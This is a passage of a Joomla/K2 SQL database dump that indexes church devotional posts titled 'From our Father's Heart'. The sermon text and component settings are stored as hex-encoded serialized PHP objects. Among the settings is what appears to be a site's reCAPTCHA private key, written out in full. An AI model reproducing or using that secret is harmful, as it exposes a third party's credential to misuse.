b733a31303a2273746172745f64617465223b733a31393a22323031362d31322d33312032313a33383a3535223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(301, 'index.php?option=com_k2&view=item&id=47', 'index.php?option=com_k2&view=item&id=47:from-our-father-s-heart-7-05-2017', 'From our Father\'s Heart (7/05/2017)', ' Dearly Beloved, Live Up To Your Calling! Raise your life to the level of your calling. Don\'t continue living at the level of your convenience. Jack up your life to the level of God\'s mandate over your life. Whether you like it or not, there is a divine call and mandate of heaven over your life that you must give account for when you come face-to-face with the Father in eternity and you need to raise your life to the level of that divine mandate. ', '2018-08-24 15:17:02', '418eab431ae24b48254540cd72b914a9', 1, 1, 1, '*', '2017-05-07 16:09:00', '0000-00-00 00:00:00', '2017-05-07 16:09:00', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223437223b733a353a22616c696173223b733a33333a2266726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a373a2273756d6d617279223b733a3438303a223c703e446561726c792042656c6f7665642cc2a03c2f703e0d0a3c703e4c69766520557020546f20596f75722043616c6c696e6721c2a03c2f703e0d0a3c703e526169736520796f7572206c69666520746f20746865206c6576656c206f6620796f75722063616c6c696e672e20446f6e277420636f6e74696e7565206c6976696e6720617420746865206c6576656c206f6620796f757220636f6e76656e69656e63652e204a61636b20757020796f7572206c69666520746f20746865206c6576656c206f6620476f642773206d616e64617465206f76657220796f7572206c6966652e205768657468657220796f75206c696b65206974206f72206e6f742c207468657265206973206120646976696e652063616c6c20616e64206d616e64617465206f662068656176656e206f76657220796f7572206c696665207468617420796f75206d7573742067697665206163636f756e7420666f72207768656e20796f7520636f6d6520666163652d746f2d666163652077697468207468652046617468657220696e20657465726e69747920616e6420796f75206e65656420746f20726169736520796f7572206c69666520746f20746865206c6576656c206f66207468617420646976696e65206d616e646174652ec2a03c2f703e0d0a223b733a343a22626f6479223b733a313239363a220d0a3c703e4d616e792062656c69657665727320617265206c6976696e67206c6f776572207468616e207468652063616c6c206f6620476f642075706f6e207468656972206c697665732e2054686579206b6e6f772074686579206172652063616c6c65642c2074686579206861766520612073656e7365206f66207468652063616c6c2c20627574206861766520686f77657665722063686f73656e20746f207374617920617420636f6e76656e69656e6365206c6576656c207768657265207468656972206c6976657320617265206e6f74206265696e672064726976656e20616e64206861726e657373656420696e206163636f7264616e6365207769746820746865206361706163697479207468617420476f642068617320706c616365642077697468696e207468656d2ec2a03c2f703e0d0a3c703e42656c6f7665642c2074686520646576696c206f6e6c79207265636f676e697a657320796f7520696e207468652063616c6c20616e6420796f7520617265206f6e6c7920756e746f75636861626c6520746f2074686520656e656d79207768656e20796f7520617265206c6976696e6720617420746865206c6576656c206f6620476f6427732063616c6c206f76657220796f7572206c6966652e20497420697320796f757220616374697665206f7065726174696f6e20696e207468652063616c6c696e6720746861742073696c656e63657320616e64207465727269666965732074686520656e656d792e20546861742069732077687920686520747269657320746f206261747465722070656f706c6520616e64206d616b65207468656d20756e66697420666f722064657374696e79206265666f7265207468657920646973636f7665722e20486f77657665722c20796f75206172652070726976696c65676564206f6620476f6420746f20626520747261696e656420666f7220796f75722064657374696e7920616e642063616c6c696e672e205468657265666f72652c20656d627261636520697420616e64206a61636b20757020796f7572206c69666520746f20746865206c6576656c206f6620476f6427732063616c6c20666f7220796f752ec2a03c2f703e0d0a3c703e5468657265206172652074776f206e616d65732061206d616e2062656172733a3c2f703e0d0a3c703e312e20546865206e616d65206d656e2063616c6c20796f7520627920766972747565206f6620796f75722062697274682063697263756d7374616e6365732c2070726f626c656d73206f72206261636b67726f756e642e3c2f703e0d0a3c703e322e20546865206e616d65206f6620796f75722064657374696e79207468617420476f64206861732063616c6c656420796f752e205468617420697320746865206e616d6520796f75206d75737420646973636f76657220616e642066756c66696c6c2ec2a03c2f703e0d0a3c703e596f75206d757374206d616b6520757020796f7572206d696e6420746f20646973636f7665722074686174206e616d6520616e64206c6976652062792069742e2048656176656e20697320657870656374616e74206f76657220796f7572206c69666520616e6420796f75206d757374206e6f74206469736170706f696e742ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732ec2a03c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031382d30382d32342031353a31373a3031223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223139223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33363a2234373a66726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35343a22636f6d706f6e656e742f6b322f6974656d2f34372d66726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a32373a224a6f6f6d6c615c434d535c4f626a6563745c434d534f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3437223b733a353a22726f757465223b733a37333a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d34373a66726f6d2d6f75722d6661746865722d732d68656172742d372d30352d32303137223b733a353a227469746c65223b733a33353a2246726f6d206f75722046617468657227732048656172742028372f30352f3230313729223b733a31313a226465736372697074696f6e223b733a3435313a2220446561726c792042656c6f7665642c204c69766520557020546f20596f75722043616c6c696e672120526169736520796f7572206c69666520746f20746865206c6576656c206f6620796f75722063616c6c696e672e20446f6e277420636f6e74696e7565206c6976696e6720617420746865206c6576656c206f6620796f757220636f6e76656e69656e63652e204a61636b20757020796f7572206c69666520746f20746865206c6576656c206f6620476f642773206d616e64617465206f76657220796f7572206c6966652e205768657468657220796f75206c696b65206974206f72206e6f742c207468657265206973206120646976696e652063616c6c20616e64206d616e64617465206f662068656176656e206f76657220796f7572206c696665207468617420796f75206d7573742067697665206163636f756e7420666f72207768656e20796f7520636f6d6520666163652d746f2d666163652077697468207468652046617468657220696e20657465726e69747920616e6420796f75206e65656420746f20726169736520796f7572206c69666520746f20746865206c6576656c206f66207468617420646976696e65206d616e646174652e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30352d30372031363a30393a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30352d30372031363a30393a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(304, 'index.php?option=com_k2&view=item&id=61', 'index.php?option=com_k2&view=item&id=61:from-our-father-s-heart-26-08-2018', 'From our Father\'s Heart (26/08/2018)', ' Dearly Beloved, ENHANCING YOUR SENSITIVITY TO THE HOLY SPIRIT is one of the ways to break into the realm of exceeding abundantly above life. There are four levels of sensitivity that is available to man: ', '2018-08-24 15:18:42', 'a2eabb49b01e207b7508c92cdc991660', 1, 1, 1, '*', '2018-08-24 15:17:03', '0000-00-00 00:00:00', '2018-08-24 15:17:03', '0000-00-00 00:00:00', 0, 0, 2, 